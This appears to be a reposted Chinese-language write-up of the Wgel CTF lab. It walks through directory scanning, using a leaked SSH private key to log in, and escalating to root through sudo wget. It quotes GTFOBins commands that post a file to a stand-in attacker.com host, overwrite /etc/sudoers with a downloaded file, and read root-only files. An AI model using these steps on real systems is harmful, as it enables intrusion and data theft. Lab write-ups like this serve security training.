Wgel CTF

news/2025/11/19 0:17:17/文章来源:https://www.cnblogs.com/yatq/p/19239839

Wgel CTF

刚进去发现是Ubuntu-Apache2的默认界面

源码注释:

 <!-- Jessie don't forget to udate the webiste -->

目录扫描:

[12:06:23] Starting: 
[12:06:27] 403 -  278B  - /.ht_wsr.txt                                      
[12:06:27] 403 -  278B  - /.htaccess.bak1                                   
[12:06:27] 403 -  278B  - /.htaccess.orig                                   
[12:06:27] 403 -  278B  - /.htaccess.save                                   
[12:06:27] 403 -  278B  - /.htaccess.sample                                 
[12:06:27] 403 -  278B  - /.htaccess_extra                                  
[12:06:27] 403 -  278B  - /.htaccessBAK
[12:06:27] 403 -  278B  - /.htaccess_orig
[12:06:27] 403 -  278B  - /.htaccessOLD
[12:06:27] 403 -  278B  - /.htaccess_sc
[12:06:27] 403 -  278B  - /.htaccessOLD2
[12:06:27] 403 -  278B  - /.htm                                             
[12:06:27] 403 -  278B  - /.html
[12:06:27] 403 -  278B  - /.htpasswd_test                                   
[12:06:27] 403 -  278B  - /.htpasswds                                       
[12:06:27] 403 -  278B  - /.httr-oauth
[12:07:27] 403 -  278B  - /server-status
[12:07:27] 403 -  278B  - /server-status/                                   
[12:07:30] 301 -  316B  - /sitemap  ->  http://10.201.121.59/sitemap/

找到一个好用的字典:

接着扫描:

~$ gobuster dir -u http://10.201.13.133/sitemap/ -w ~/SecLists/Discovery/Web-Content/big.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.201.13.133/sitemap/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/Birkenwald/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/.ssh                 (Status: 301) [Size: 321] [--> http://10.201.13.133/sitemap/.ssh/]
/css                  (Status: 301) [Size: 320] [--> http://10.201.13.133/sitemap/css/]
/fonts                (Status: 301) [Size: 322] [--> http://10.201.13.133/sitemap/fonts/]
/images               (Status: 301) [Size: 323] [--> http://10.201.13.133/sitemap/images/]
/js                   (Status: 301) [Size: 319] [--> http://10.201.13.133/sitemap/js/]
Progress: 20481 / 20482 (100.00%)
===============================================================
Finished
===============================================================

我们可以看到.ssh被泄露,访问呢之后可以拿到rsa私钥.

这时候我们想起前面的注释提到的名字.猜测可能是用户名:

chmod 400 id_rsa.txt
sudo ssh -i id_rsa.txt jessie@10.201.13.133

连接之后我们搜索到当前用户能够访问到的flag:

>find / -name *flag*
/home/jessie/Documents/user_flag.txt

然后我们执行sudo -l 查看有没有哪些不需要密码就可以以root权限执行的命令:

注意sudo -i显示的内容在/etc/sudoers中.

发现wget可以利用.

这里有两种打法:

通过覆盖etc/sudoers文件,修改不用密码可root权限执行的命令的范围.
通过猜测在root目录下flag文件名为root_flag.txt来直接读取.

具体利用手法参考:https://gtfobins.github.io/gtfobins/wget/

思路一:

上传出来要改写的具体文件内容:
URL=http://attacker.com/
LFILE=file_to_send
wget --post-file=$LFILE $URL改写后:
URL=http://attacker.com/file_to_get
LFILE=file_to_save
wget $URL -O $LFILE

思路二:

LFILE=file_to_read
wget -i $LFILE

成功拿到root_flag.

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/969483.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

Pickle Rick

Pickle Rick #################### 正在进行目录扫描..._|. _ _ _ _ _ _|_ v0.4.3(_||| _) (/_(_|| (_| )Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 1226…

Wgel CTF

Wgel CTF

相关文章